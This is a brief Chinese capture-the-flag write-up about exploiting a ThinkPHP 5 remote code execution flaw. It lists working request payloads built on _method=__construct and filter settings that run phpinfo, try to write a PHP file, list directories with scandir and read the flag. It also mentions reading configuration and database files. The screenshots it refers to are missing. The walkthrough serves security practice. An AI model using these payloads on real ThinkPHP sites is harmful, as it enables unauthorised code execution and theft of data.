打开链接发现是tp5的框架
    用网上的payload打
    _method=__construct&method=get&filter=call_user_func&get[]=phpinfo
    成功执行phpinfo
    3.png
    存在RCE
    发现过滤了一些函数5.png
    在php7.1.33版本中无法使用assert
    s=file_put_contents('test.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    通过scandir函数查看目录
    _method=__construct&filter[]=scandir&filter[]=var_dump&method=GET&get[]=/

    发现flag文件
    6.png

    利用readfile函数进行读取7.png

    注: 利用姿势还有很多 比如读取配置文件 数据库文件等